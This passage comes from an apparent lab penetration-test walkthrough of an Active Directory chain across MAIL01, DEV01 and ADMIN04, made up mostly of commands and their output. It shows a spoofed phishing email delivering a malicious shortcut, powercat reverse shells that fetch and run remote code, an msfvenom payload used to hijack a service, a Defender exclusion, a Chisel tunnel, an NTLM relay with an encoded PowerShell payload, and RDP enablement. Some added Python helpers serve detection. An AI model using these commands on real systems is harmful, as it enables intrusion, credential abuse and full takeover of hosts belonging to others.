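    """Every <simpleLocation><url> in document order; raises ET.ParseError on malformed XML."""
    data = xml_text.encode("utf-8") if isinstance(xml_text, str) else xml_text
    root = ET.fromstring(data)
    if root.tag != f"{{{LIBRARY_NS}}}libraryDescription":
        raise ValueError(f"not a library description: {root.tag}")
    return [(url.text or "").strip()
            for loc in root.iter(f"{{{LIBRARY_NS}}}simpleLocation")
            for url in loc.findall(f"{{{LIBRARY_NS}}}url")]


def is_well_formed_library(xml_text: str | bytes) -> bool:
    """False for files no XML parser accepts, e.g. a tag typed as '<isDefaultSaveLocation<true'."""
    try:
        library_locations(xml_text)
        return True
    except (ET.ParseError, ValueError):
        return False


def is_remote_location(url: str) -> bool:
    """True when resolving the location makes Explorer reach out over the network."""
    if url.startswith("\\\\"):            # UNC path -> SMB
        return True
    parsed = urlparse(url)
    return parsed.scheme in ("http", "https") and bool(parsed.netloc)   # -> WebDAV


def remote_hosts(xml_text: str | bytes) -> list[str]:
    """host[:port] values a user opening this library would connect to (the phishing tell)."""
    hosts = []
    for loc in library_locations(xml_text):
        if loc.startswith("\\\\"):
            hosts.append(loc[2:].split("\\", 1)[0])
        elif is_remote_location(loc):
            hosts.append(urlparse(loc).netloc)
    return hosts


if __name__ == "__main__":
    print(remote_hosts(SAMPLE_LIBRARY_MS))
```

Run it against the file in ~/webdav before sending: an empty list or a parse failure means the library will not point the victim at the WebDAV server. A mail gateway rule that rejects Library-ms attachments whose remote_hosts() is non-empty catches this delivery technique regardless of the payload behind it.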

6. Transferred a PowerShell shortcut file carrying the reverse shell payload to the Web Root Directory. The .lnk was built on a Windows VM (as user1), its target and arguments were read back with WScript.Shell to confirm the payload, and it was then copied over SSH to Kali's NAT address (192.168.44.130).

┌──(kali㉿kali)-[~/webdav]
└─$ sudo systemctl start ssh              
[sudo] password for kali: 

PS C:\Users\user1> $sc=(New-Object -ComObject WScript.Shell).CreateShortcut('C:\Users\user1\powershell.lnk'); "$($sc.TargetPath) $($sc.Arguments)"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.10:8002/powercat.ps1'); powercat -c 10.10.14.10 -p 4446 -e powershell"

PS C:\Users\user1> scp powershell.lnk kali@192.168.44.130:/home/kali/webdav
The authenticity of host '192.168.44.130 (192.168.44.130)' can't be established.
ED25519 key fingerprint is SHA256:rM9T5UaJ4bi41GdjMrfHyMDBbPsl3AFkQatT6cW71iI.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])?
Warning: Permanently added '192.168.44.130' (ED25519) to the list of known hosts.
kali@192.168.44.130's password:
powershell.lnk                                                                        100% 2038     1.9MB/s   00:00

┌──(kali㉿kali)-[~/webdav]
└─$ ls ~/webdav/powershell.lnk
/home/kali/webdav/powershell.lnk

7. Prepared an Email Body File

┌──(kali㉿kali)-[~/webdav]
└─$ echo "test" > body.txt

8. Staged the Powercat Script for Remote Execution

┌──(kali㉿kali)-[~/webdav]
└─$ find / -name powercat.ps1 -type f 2>/dev/null
/usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1

┌──(kali㉿kali)-[~/webdav]
└─$ cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .

9. Confirmed the Necessary Files Exist

┌──(kali㉿kali)-[~/webdav]
└─$ ls /home/kali/webdav
body.txt  config.Library-ms  powercat.ps1  powershell.lnk

10. Started a Python3 HTTP Server to Serve powercat.ps1

┌──(kali㉿kali)-[~/webdav]
└─$ python3 -m http.server 8002
Serving HTTP on 0.0.0.0 port 8002 (http://0.0.0.0:8002/) ...

11. Verified Connectivity to the Mail Server

┌──(kali㉿kali)-[~/webdav]
└─$ telnet mail01.ad.lab 25
Trying 10.10.14.80...
Connected to mail01.ad.lab.
Escape character is '^]'.
220 MAIL01.AD.LAB Microsoft ESMTP MAIL Service, Version: 10.0.20348.1 ready at  Fri, 7 Feb 2025 23:55:58 -0800
quit
Connection closed by foreign host.


Note: Ensure receiver.py is started on DEV01 before proceeding to the next steps.

12. Staged and Sent an Email with the Library File and the Reverse Shell Shortcut, via swaks (the server accepts an unauthenticated MAIL FROM for an internal sender, so the message is spoofed from chris@ad.lab)

┌──(kali㉿kali)-[~/webdav]
└─$ swaks -t daniela@ad.lab --from chris@ad.lab --server 10.10.14.80 --attach @config.Library-ms --attach @powershell.lnk --body @body.txt --header "Subject: Staging Script" --suppress-data
=== Trying 10.10.14.80:25...
=== Connected to 10.10.14.80.
<-  220 MAIL01.AD.LAB Microsoft ESMTP MAIL Service, Version: 10.0.20348.1 ready at  Fri, 7 Feb 2025 23:57:09 -0800
 -> EHLO kali
<-  250-MAIL01.AD.LAB Hello [10.10.14.10]
<-  250-TURN
<-  250-SIZE 2097152
<-  250-ETRN
<-  250-PIPELINING
<-  250-DSN
<-  250-ENHANCEDSTATUSCODES
<-  250-8bitmime
<-  250-BINARYMIME
<-  250-CHUNKING
<-  250-VRFY
<-  250 OK
 -> MAIL FROM:<chris@ad.lab>
<-  250 2.1.0 chris@ad.lab....Sender OK
 -> RCPT TO:<daniela@ad.lab>
<-  250 2.1.5 daniela@ad.lab
 -> DATA
<-  354 Start mail input; end with <CRLF>.<CRLF>
 -> 80 lines sent
<-  250 2.6.0  <20250208025710.028151@kali> Queued mail for delivery
 -> QUIT
<-  221 2.0.0 MAIL01.AD.LAB Service closing transmission channel
=== Connection closed with remote host.

DEV01 Attacks

1. Spawned a medium integrity reverse shell on DEV01, as Daniela

┌──(kali㉿kali)-[~/webdav]
└─$ nc -nvlp 4446
listening on [any] 4446 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.14.100] 50005
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\System32\WindowsPowerShell\v1.0> whoami; hostname
whoami; hostname

ad\daniela
DEV01

2. Confirmed we have a Medium Integrity Shell

PS C:\Windows\System32\WindowsPowerShell\v1.0> whoami /groups
whoami /groups

GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
=========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                     Alias            S-1-5-32-544 Group used for deny only
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE                   Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1     Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192

3. Verified Write Permissions on the Service Directory

PS C:\Windows\System32\WindowsPowerShell\v1.0> icacls "C:\MyService"
icacls "C:\MyService"
C:\MyService NT AUTHORITY\SYSTEM:(OI)(CI)(F)
             BUILTIN\Users:(OI)(CI)(M)

Successfully processed 1 files; Failed processing 0 files

4. Verified the Service is Configured to Auto-Start

PS C:\Windows\System32\WindowsPowerShell\v1.0> sc.exe qc MyService
sc.exe qc MyService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: MyService
        TYPE               : 10  WIN32_OWN_PROCESS 
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\MyService\program.exe
        LOAD_ORDER_GROUP   : 
        TAG                : 0
        DISPLAY_NAME       : MyService
        DEPENDENCIES       : 
        SERVICE_START_NAME : LocalSystem

5. Confirmed SeShutdownPrivilege is held, so a reboot is possible ("Disabled" only means the privilege is not yet enabled in the token; shutdown.exe enables it itself)

PS C:\Windows\System32\WindowsPowerShell\v1.0> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled
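
Added example, not code from the original notes: the three checks above (icacls on the service directory, sc.exe qc on the service, whoami /priv) turned into a triage function over captured output, so the same decision can be made over enumeration collected from many hosts instead of by eye. The sample outputs are constructed to mirror the DEV01 transcript; LOW_PRIV_PRINCIPALS and WRITE_RIGHTS are this example's own assumptions about which principals and which icacls rights matter.

```python
"""Decide from captured enumeration output whether a service binary can be hijacked."""
from __future__ import annotations

import ntpath
import re

# Constructed samples mirroring the DEV01 transcript.
ICACLS_OUTPUT = r"""C:\MyService NT AUTHORITY\SYSTEM:(OI)(CI)(F)
             BUILTIN\Users:(OI)(CI)(M)

Successfully processed 1 files; Failed processing 0 files
"""

SC_QC_OUTPUT = r"""[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: MyService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\MyService\program.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : MyService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

WHOAMI_PRIV_OUTPUT = """Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
"""

# Groups an ordinary domain user ends up in (assumption for this lab).
LOW_PRIV_PRINCIPALS = {r"BUILTIN\Users", "Everyone", r"NT AUTHORITY\Authenticated Users"}
# icacls rights that let the holder replace, rename or delete files in a directory (assumption).
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "D", "DC", "WDAC", "WO"}
INHERITANCE_FLAGS = {"OI", "CI", "IO", "NP", "I"}

_ACE_RE = re.compile(r"^\s*(?P<who>[^:()]+):(?P<flags>(?:\([^)]*\))+)\s*$")


def parse_icacls(text: str, path: str) -> list[tuple[str, set[str]]]:
    """(principal, rights) pairs from icacls output; the path prefix on the first line is stripped."""
    aces = []
    for line in text.splitlines():
        if line.startswith(path):
            line = line[len(path):]
        m = _ACE_RE.match(line)
        if not m:
            continue
        flags = re.findall(r"\(([^)]*)\)", m.group("flags"))
        rights = {r for f in flags for r in f.split(",") if r not in INHERITANCE_FLAGS}
        aces.append((m.group("who").strip(), rights))
    return aces


def parse_sc_qc(text: str) -> dict[str, str]:
    """KEY : VALUE fields of sc.exe qc output (START_TYPE, BINARY_PATH_NAME, SERVICE_START_NAME, ...)."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r"^\s*([A-Z_]+)\s*:\s*(.*?)\s*$", line)
        if m:
            fields[m.group(1)] = m.group(2)
    return fields


def parse_privileges(text: str) -> dict[str, str]:
    """Privilege name -> state from whoami /priv; 'Disabled' still means the token holds it."""
    return dict(re.findall(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$", text, re.M))


def assess_service(icacls_text: str, sc_text: str, priv_text: str,
                   low_priv: set[str] = LOW_PRIV_PRINCIPALS) -> dict:
    """Summarise the privesc preconditions; 'exploitable' is True only when all of them hold."""
    cfg = parse_sc_qc(sc_text)
    binary = cfg.get("BINARY_PATH_NAME", "").strip('"')
    service_dir = ntpath.dirname(binary)
    writable_by = sorted(who for who, rights in parse_icacls(icacls_text, service_dir)
                         if who in low_priv and rights & WRITE_RIGHTS)
    privs = parse_privileges(priv_text)
    result = {
        "binary": binary,
        "writable_by": writable_by,
        "auto_start": "AUTO_START" in cfg.get("START_TYPE", ""),
        "runs_as_system": cfg.get("SERVICE_START_NAME", "").lower()
                          in {"localsystem", r"nt authority\system"},
        "can_reboot": "SeShutdownPrivilege" in privs,   # held even when listed as Disabled
    }
    result["exploitable"] = all((writable_by, result["auto_start"],
                                 result["runs_as_system"], result["can_reboot"]))
    return result


if __name__ == "__main__":
    print(assess_service(ICACLS_OUTPUT, SC_QC_OUTPUT, WHOAMI_PRIV_OUTPUT))
```

The fix on the defending side falls out of the same function: remove the (M) grant for BUILTIN\Users on the service directory and "writable_by" is empty, so "exploitable" turns False even though the service still auto-starts as LocalSystem.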

6. Renamed the program in the Service Root Directory to back it up

PS C:\Windows\System32\WindowsPowerShell\v1.0> move "C:\MyService\program.exe" "C:\MyService\bak_program.exe"

7. Created a reverse shell binary

┌──(kali㉿kali)-[~/webdav]
└─$ cd ~

┌──(kali㉿kali)-[~]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.10 LPORT=4447 -f exe -o ~/payload4447.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: /home/kali/payload4447.exe

8. Started a second Python3 HTTP Server on Port 8000 from the home directory to serve the binary (the server on 8002 only serves ~/webdav)

┌──(kali㉿kali)-[~]
└─$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

9. Downloaded the reverse shell binary to the Service Root Directory

PS C:\Windows\System32\WindowsPowerShell\v1.0> wget "http://10.10.14.10:8000/payload4447.exe" -O "C:\MyService\program.exe"
wget "http://10.10.14.10:8000/payload4447.exe" -O "C:\MyService\program.exe"

10. Rebooted DEV01 to Trigger the Reverse Shell

PS C:\Windows\System32\WindowsPowerShell\v1.0> shutdown /r /f /t 0
shutdown /r /f /t 0

11. Spawned a SYSTEM Reverse Shell on DEV01

┌──(kali㉿kali)-[~]
└─$ nc -nvlp 4447
listening on [any] 4447 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.14.100] 49693
Microsoft Windows [Version 10.0.26100.2894]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\System32>whoami
whoami
nt authority\system

C:\Windows\System32>hostname
hostname
DEV01

Note: Ensure Apache and MySQL are started on DEV01 before proceeding to the next steps.

12. Examined Network Connections and Found HTTP Listening

C:\Windows\System32> netstat -ano | findstr :80
netstat -ano | findstr :80
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       3712
  TCP    [::]:80                [::]:0                 LISTENING       3712

13. Downloaded and Prepared Chisel (Linux server binary for Kali, Windows client binary for DEV01)

┌──(kali㉿kali)-[~]
└─$ wget https://github.com/jpillora/chisel/releases/download/v1.10.1/chisel_1.10.1_linux_amd64.gz -O chisel_1.10.1_linux_amd64.gz
--2025-02-20 22:26:30--  https://github.com/jpillora/chisel/releases/download/v1.10.1/chisel_1.10.1_linux_amd64.gz
Resolving github.com (github.com)... 140.82.112.3
Connecting to github.com (github.com)|140.82.112.3|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/31311037/1cb6410b-6deb-4214-8793-2685ecacfc34?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250221%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250221T032629Z&X-Amz-Expires=300&X-Amz-Signature=e8dc481ad44184db00fb16ad920037ca0f962c8bb17becad3b0530d6fc092b84&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dchisel_1.10.1_linux_amd64.gz&response-content-type=application%2Foctet-stream [following]
--2025-02-20 22:26:30--  https://objects.githubusercontent.com/github-production-release-asset-2e65be/31311037/1cb6410b-6deb-4214-8793-2685ecacfc34?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250221%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250221T032629Z&X-Amz-Expires=300&X-Amz-Signature=e8dc481ad44184db00fb16ad920037ca0f962c8bb17becad3b0530d6fc092b84&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dchisel_1.10.1_linux_amd64.gz&response-content-type=application%2Foctet-stream
Resolving objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.108.133, 185.199.109.133, 185.199.110.133, ...
Connecting to objects.githubusercontent.com (objects.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3888423 (3.7M) [application/octet-stream]
Saving to: ‘chisel_1.10.1_linux_amd64.gz’

chisel_1.10.1_linux 100%[================>]   3.71M  7.69MB/s    in 0.5s

2025-02-20 22:26:31 (7.69 MB/s) - ‘chisel_1.10.1_linux_amd64.gz’ saved [3888423/3888423]


┌──(kali㉿kali)-[~]
└─$ wget https://github.com/jpillora/chisel/releases/download/v1.10.1/chisel_1.10.1_windows_amd64.gz -O chisel_1.10.1_windows_amd64.gz
--2025-02-20 22:27:55--  https://github.com/jpillora/chisel/releases/download/v1.10.1/chisel_1.10.1_windows_amd64.gz
Resolving github.com (github.com)... 140.82.113.4
Connecting to github.com (github.com)|140.82.113.4|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/31311037/5938e0c3-b608-40ce-904a-a04a54a20fdd?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250221%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250221T032755Z&X-Amz-Expires=300&X-Amz-Signature=ed045079dba9cb11ebdb38c0ca472e17e09bf8f3baf3b4dd456f87257d139e30&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dchisel_1.10.1_windows_amd64.gz&response-content-type=application%2Foctet-stream [following]
--2025-02-20 22:27:56--  https://objects.githubusercontent.com/github-production-release-asset-2e65be/31311037/5938e0c3-b608-40ce-904a-a04a54a20fdd?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250221%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250221T032755Z&X-Amz-Expires=300&X-Amz-Signature=ed045079dba9cb11ebdb38c0ca472e17e09bf8f3baf3b4dd456f87257d139e30&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dchisel_1.10.1_windows_amd64.gz&response-content-type=application%2Foctet-stream
Resolving objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.108.133, 185.199.109.133, 185.199.110.133, ...
Connecting to objects.githubusercontent.com (objects.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4020166 (3.8M) [application/octet-stream]
Saving to: ‘chisel_1.10.1_windows_amd64.gz’

chisel_1.10.1_windo 100%[================>]   3.83M  7.69MB/s    in 0.5s

2025-02-20 22:27:57 (7.69 MB/s) - ‘chisel_1.10.1_windows_amd64.gz’ saved [4020166/4020166]

┌──(kali㉿kali)-[~]
└─$ gunzip chisel_1.10.1_windows_amd64.gz

┌──(kali㉿kali)-[~]
└─$ gunzip chisel_1.10.1_linux_amd64.gz

┌──(kali㉿kali)-[~]
└─$ mv chisel_1.10.1_windows_amd64 chisel.exe

┌──(kali㉿kali)-[~]
└─$ mv chisel_1.10.1_linux_amd64 chisel

┌──(kali㉿kali)-[~]
└─$ chmod +x chisel

14. Started Chisel Server in Kali

┌──(kali㉿kali)-[~]
└─$ ./chisel server --port 8080 --reverse
2025/02/15 19:53:23 server: Reverse tunnelling enabled
2025/02/15 19:53:23 server: Fingerprint PJIU/uHky+UyCcoAnGNRNSH0Ml9XmHCryj2PytI2rDc=

15. Added a Windows Defender Directory Exclusion to Allow Chisel Upload

C:\Windows\System32> powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\System32> Add-MpPreference -ExclusionPath "C:\Users\Public"
Add-MpPreference -ExclusionPath "C:\Users\Public"

16. Downloaded the Chisel Client to C:\Users\Public

PS C:\Windows\System32> wget http://10.10.14.10:8000/chisel.exe -O C:\Users\Public\chisel.exe
wget http://10.10.14.10:8000/chisel.exe -O C:\Users\Public\chisel.exe

17. Launched the Chisel Client to Establish a Reverse Tunnel to Kali. R:80:127.0.0.1:80 makes the Chisel server open port 80 on Kali and forward it to DEV01's local web server. Binding a port below 1024 on Linux needs root or CAP_NET_BIND_SERVICE; if the server runs unprivileged, use a high port such as R:8081:127.0.0.1:80 and adjust the curl and Firefox URLs below accordingly.

PS C:\Windows\System32> cd "C:\Users\Public"
cd "C:\Users\Public"

PS C:\Users\Public> .\chisel.exe client 10.10.14.10:8080 R:80:127.0.0.1:80
.\chisel.exe client 10.10.14.10:8080 R:80:127.0.0.1:80

Back on Chisel Server:
2025/03/21 17:39:13 server: session#1: tun: proxy#R:80=>80: Listening

18. Retrieved HTTP headers from the WordPress login page to confirm its availability and server configuration.

┌──(kali㉿kali)-[~]
└─$ curl -I http://127.0.0.1/wordpress/wordpress/wp-login.php
HTTP/1.1 200 OK
Date: Sat, 08 Feb 2025 08:25:55 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Set-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/wordpress/wordpress/
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=UTF-8

19. Accessed the WordPress login page and used the previously AS-REP Roasted credentials to log in.

┌──(kali㉿kali)-[~]
└─$ firefox http://127.0.0.1/wordpress/wordpress/wp-login.php

Login Credentials:
ernesto@ad.lab
lucky#1

(Note: You may have to submit the login form twice)

20. Viewed the "Backup and Migration" plugin:


a. In Wordpress, go to: "Dashboard" > "Settings" > "Backup and Migration"

(Found an input field, for a network share.)

21. Generated a base64-encoded reverse shell payload for -EncodedCommand (PowerShell expects the base64 of the UTF-16LE bytes of the script, hence [System.Text.Encoding]::Unicode rather than UTF8)

┌──(kali㉿kali)-[~]
└─$ pwsh
PowerShell 7.2.6
Copyright (c) Microsoft Corporation.
https://aka.ms/powershell
Type 'help' to get help.

┌──(kali㉿kali)-[/home/kali]
└─PS> $Text  = "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.10:8002/powercat.ps1');powercat -c 10.10.14.10 -p 4448 -e powershell"

┌──(kali㉿kali)-[/home/kali]
└─PS> $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)

┌──(kali㉿kali)-[/home/kali]
└─PS> $Encoded = [Convert]::ToBase64String($Bytes)

┌──(kali㉿kali)-[/home/kali]
└─PS> $Wrapped = "powershell.exe -NoP -NonI -ExecutionPolicy Bypass -EncodedCommand $Encoded"

┌──(kali㉿kali)-[/home/kali]
└─PS> $Wrapped
powershell.exe -NoP -NonI -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMQAwADoAOAAwADAAMgAvAHAAbwB3AGUAcgBjAGEAdAAuAHAAcwAxACcAKQA7AHAAbwB3AGUAcgBjAGEAdAAgAC0AYwAgADEAMAAuADEAMAAuADEANAAuADEAMAAgAC0AcAAgADQANAA0ADgAIAAtAGUAIABwAG8AdwBlAHIAcwBoAGUAbABsAA==

┌──(kali㉿kali)-[/home/kali]
└─PS> exit
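
Added example, not code from the original notes: the same -EncodedCommand transform in Python, in both directions. Encoding is base64 over UTF-16LE (an ASCII or UTF-8 base64 blob silently produces garbage), and decoding is what an analyst does to an -EncodedCommand argument seen in a Sysmon event 1 or 4688 command line. STAGER is the command line from the pwsh session above, so the result can be compared with the blob printed there; the parameter aliases in the regex (-e, -ec, -enc) are the documented short forms of -EncodedCommand.

```python
"""Build and decode PowerShell -EncodedCommand payloads."""
from __future__ import annotations

import base64
import re

# Command line staged above (lab host and port; kept verbatim for comparison).
STAGER = ("IEX(New-Object System.Net.WebClient).DownloadString("
          "'http://10.10.14.10:8002/powercat.ps1');"
          "powercat -c 10.10.14.10 -p 4448 -e powershell")


def encode_command(script: str) -> str:
    """Base64 of the UTF-16LE bytes, exactly what powershell.exe -EncodedCommand expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob: str) -> str:
    """Reverse transform; rejects blobs whose byte count cannot be UTF-16."""
    raw = base64.b64decode(blob, validate=True)
    if len(raw) % 2:
        raise ValueError("UTF-16LE payload must have an even byte count")
    return raw.decode("utf-16-le")


def wrap(script: str) -> str:
    """Full launcher line, as passed to ntlmrelayx -c in the next step."""
    return ("powershell.exe -NoP -NonI -ExecutionPolicy Bypass "
            f"-EncodedCommand {encode_command(script)}")


# -EncodedCommand and its short forms, followed by the base64 argument.
_ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def extract_encoded(cmdline: str) -> str | None:
    """Decoded script from a logged command line, or None if it carries no encoded command."""
    m = _ENC_RE.search(cmdline)
    return decode_command(m.group(1)) if m else None


if __name__ == "__main__":
    print(wrap(STAGER))
    print(extract_encoded(wrap(STAGER)))
```

extract_encoded() is the useful half for detection: the decoded text still contains the plain DownloadString and the callback host and port, which is what a process-creation rule should match on rather than the base64 itself.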

22. Used impacket-ntlmrelayx to relay Francesca's NTLM authentication to ADMIN04, execute the encoded PowerShell command and establish a SYSTEM reverse shell on ADMIN04. Samba is stopped first so ntlmrelayx can bind port 445. The relay only succeeds because ADMIN04 does not require SMB signing and Francesca has local administrator rights there; ntlmrelayx needs admin on the target to start RemoteRegistry and run the command.

┌──(kali㉿kali)-[~]
└─$ sudo systemctl stop smbd

┌──(kali㉿kali)-[~]
└─$ impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.14.120 -c "powershell.exe -NoP -NonI -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMQAwADoAOAAwADAAMgAvAHAAbwB3AGUAcgBjAGEAdAAuAHAAcwAxACcAKQA7AHAAbwB3AGUAcgBjAGEAdAAgAC0AYwAgADEAMAAuADEAMAAuADEANAAuADEAMAAgAC0AcAAgADQANAA0ADgAIAAtAGUAIABwAG8AdwBlAHIAcwBoAGUAbABsAA=="
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client HTTPS loaded..

[*] Protocol Client HTTP loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client SMTP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Multirelay disabled

[*] Servers started, waiting for connections

23. Staged the Powercat Script for Remote Execution

┌──(kali㉿kali)-[~]
└─$ find / -name powercat.ps1 -type f 2>/dev/null
/usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1

┌──(kali㉿kali)-[~]
└─$ cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 ~/webdav/powercat.ps1

24. Ensured a Python3 HTTP server is serving ~/webdav on port 8002 (restarted here; skip if the one from MAIL01 step 10 is still running)

┌──(kali㉿kali)-[~/webdav]
└─$ python3 -m http.server 8002
Serving HTTP on 0.0.0.0 port 8002 (http://0.0.0.0:8002/) ...

25. Entered a UNC path pointing at Kali with an arbitrary share name, so the plugin authenticates to ntlmrelayx:


a. Backup Storage Location (UNC Path): \\10.10.14.10\test
b. Windows Username: [arbitrary value]
c. Windows Password: [arbitrary value]
d. Click "Save Changes"
e. Click "Test Connection" to trigger the reverse shell.

Connection Test Result:
Failed to open: \\10.10.14.10\test\
Ensure OS-level credentials are set or the service user has permissions.


[*] SMBD-Thread-4 (process_request_thread): Received connection from 10.10.14.100, attacking target smb://10.10.14.120
[*] Authenticating against smb://10.10.14.120 as AD/FRANCESCA SUCCEED
[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Executed specified command on host: 10.10.14.120

ADMIN04 Attacks

1. Spawned a Reverse Shell as SYSTEM

┌──(kali㉿kali)-[~]
└─$ nc -nvlp 4448
listening on [any] 4448 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.14.120] 49771
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\System32> whoami;hostname
whoami;hostname
nt authority\system
ADMIN04

2. Modified the registry to enable Remote Desktop by setting the fDenyTSConnections value to 0.

PS C:\Windows\System32> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
The operation completed successfully.

3. Enabled Remote Desktop in the Windows firewall

